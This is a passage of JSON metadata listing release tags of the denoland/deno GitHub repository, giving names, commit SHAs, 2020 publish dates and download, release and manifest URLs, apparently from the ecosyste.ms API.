/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.